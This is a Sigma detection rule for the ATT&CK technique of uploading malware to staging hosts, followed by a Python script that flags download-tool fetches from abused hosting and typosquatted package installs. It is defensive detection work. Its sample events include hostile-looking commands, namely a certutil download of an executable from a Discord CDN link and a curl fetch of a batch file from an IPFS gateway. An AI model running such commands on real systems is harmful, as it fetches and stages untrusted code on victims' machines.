title: Upload Malware (T1608.001)
id: df00tech-t1608-001
status: experimental
description: "Adversaries may upload malware to third-party or adversary-controlled infrastructure to make it accessible during targeting. This includes placing payloads on compromised or purchased web servers, abusing public file-sharing services (Discord CDN, Pastebin, Dropbox, Google Drive), hosting on the InterPlanetary File System (IPFS) to resist takedowns, embedding in blockchain smart contracts, or backdooring software packages uploaded to repositories such as PyPI, NPM, Docker Hub, and GitHub. Detection of this PRE-attack technique occurs primarily on the victim side — when endpoints retrieve the staged malware — rather than at the point of upload. Detection strategies focus on network and file telemetry identifying executable content downloads from suspicious hosting platforms, abnormal use of download LOLBins, and package manager installs of typosquatted or newly-published packages."
references:
  - https://attack.mitre.org/techniques/T1608/001/
  - https://df00tech.com/detections/T1608.001
author: df00tech
date: 2026/03/13
tags:
  - attack.t1608.001
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: network_connection
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  # Placeholder only: a selection of EventID '*' matches every event in the log source,
  # so this rule must not be deployed as-is. Replace the selection with the translated
  # query logic (executable downloads from abused hosting, download LOLBins such as
  # certutil.exe/bitsadmin.exe, and package-manager installs of lookalike packages).
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - Software developers and researchers legitimately accessing IPFS gateways to retrieve decentralized content or test IPFS-hosted applications
  - "IT administrators using certutil.exe or bitsadmin.exe for legitimate software distribution, update delivery, or certificate operations"
  - "Users downloading legitimate installers from file-sharing platforms (Discord attachments shared in dev communities, transfer.sh for ops file sharing)"
  - CI/CD pipeline agents using curl or wget to fetch build artifacts or bootstrap scripts from GitHub raw content URLs
  - Browser-initiated downloads of legitimate software from sites that share infrastructure with abused platforms
level: medium
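Because the rule body above is a placeholder, the following is an added, runnable illustration of the victim-side detection strategies the description names: download LOLBins fetching executable content from abused hosting platforms, and package-manager installs of typosquatted names. It is not the df00tech rule or its KQL/SPL query. The event shape mimics a reduced Sysmon process-creation record; the hosting list, LOLBin command-line patterns, the popular-package list, the `svc-ci-agent` allowlist entry and all sample events are constructed assumptions to be tuned per environment.

```python
"""Constructed victim-side detection for T1608.001 follow-on activity.

Added example, not the df00tech rule. Events mimic Sysmon Event ID 1 fields
(Computer, User, Image, CommandLine). All lists below are assumptions.
"""
import re
from urllib.parse import urlparse

# Hosting platforms named in the rule description (assumed list, tune per site).
ABUSED_HOSTING = {
    "cdn.discordapp.com", "media.discordapp.net", "pastebin.com",
    "dl.dropboxusercontent.com", "drive.google.com", "transfer.sh",
    "ipfs.io", "gateway.pinata.cloud", "cloudflare-ipfs.com",
}
EXECUTABLE_EXT = (".exe", ".dll", ".ps1", ".msi", ".bat", ".hta", ".scr")

# Download LOLBins: image basename -> command-line pattern indicating a fetch
# (assumed patterns based on common usage of these tools).
DOWNLOAD_LOLBINS = {
    "certutil.exe": re.compile(r"-urlcache|-split", re.I),
    "bitsadmin.exe": re.compile(r"/transfer|/addfile", re.I),
    "curl.exe": re.compile(r"https?://", re.I),
    "wget.exe": re.compile(r"https?://", re.I),
}
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)

# Allowlist modelled on the falsepositives entry for CI agents pulling from
# GitHub raw content; the account name is a constructed placeholder.
ALLOWED_CI = {("raw.githubusercontent.com", "CORP\\svc-ci-agent")}

# Popular package names for the typosquat heuristic (assumed list).
POPULAR_PACKAGES = {"requests", "urllib3", "numpy", "lodash", "express", "colorama"}
PKG_INSTALL_RE = re.compile(r"\b(pip|pip3|npm)(?:\.exe)?\s+(?:install|i)\s+(.+)", re.I)


def levenshtein(a, b):
    """Edit distance; one row of the standard DP table kept at a time."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_download(event):
    """Flag a download LOLBin whose URL points at abused hosting or executable content."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    pattern = DOWNLOAD_LOLBINS.get(image)
    if pattern is None or not pattern.search(event["CommandLine"]):
        return None
    for url in URL_RE.findall(event["CommandLine"]):
        parsed = urlparse(url)
        host = parsed.hostname or ""
        if (host, event.get("User", "")) in ALLOWED_CI:
            continue  # known CI bootstrap pattern, see falsepositives
        if host in ABUSED_HOSTING or parsed.path.lower().endswith(EXECUTABLE_EXT):
            return {"rule": "download_lolbin_abused_hosting", "image": image, "host": host}
    return None


def check_package_install(event):
    """Flag pip/npm installs of a name one edit away from a popular package."""
    m = PKG_INSTALL_RE.search(event["CommandLine"])
    if not m:
        return None
    for token in m.group(2).split():
        name = token.lower().split("==")[0]
        if token.startswith("-") or name in POPULAR_PACKAGES:
            continue  # flags or the genuine package itself
        close = [p for p in sorted(POPULAR_PACKAGES) if levenshtein(name, p) == 1]
        if close:
            return {"rule": "typosquat_package_install", "package": name, "lookalike_of": close[0]}
    return None


def analyze(events):
    """Run every check over every event; return the list of alerts in event order."""
    alerts = []
    for e in events:
        for check in (check_download, check_package_install):
            hit = check(e)
            if hit:
                hit["computer"] = e["Computer"]
                alerts.append(hit)
    return alerts


# Constructed sample events; hosts, users and paths are placeholders.
SAMPLE_EVENTS = [
    {"Computer": "WS01", "User": "CORP\\alice", "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f https://cdn.discordapp.com/attachments/1/2/update.exe C:\\Users\\Public\\update.exe"},
    {"Computer": "BUILD01", "User": "CORP\\svc-ci-agent", "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl.exe -sSL https://raw.githubusercontent.com/example-org/repo/main/bootstrap.ps1 -o bootstrap.ps1"},
    {"Computer": "WS02", "User": "CORP\\bob", "Image": "C:\\Python311\\Scripts\\pip.exe",
     "CommandLine": "pip.exe install requets"},
    {"Computer": "WS03", "User": "CORP\\carol", "Image": "C:\\Program Files\\Git\\mingw64\\bin\\curl.exe",
     "CommandLine": "curl.exe -O https://ipfs.io/ipfs/QmPLACEHOLDER/loader.bat"},
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

Run as-is, the script reports three alerts (the certutil fetch from Discord CDN, the `requets` install, and the curl fetch from an IPFS gateway) and stays silent on the CI agent's GitHub raw download, which is exactly the allowlisting the falsepositives section calls for. The typosquat check is deliberately narrow (edit distance 1 against a curated list); the "newly-published package" signal in the description needs registry metadata that a process event does not carry.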
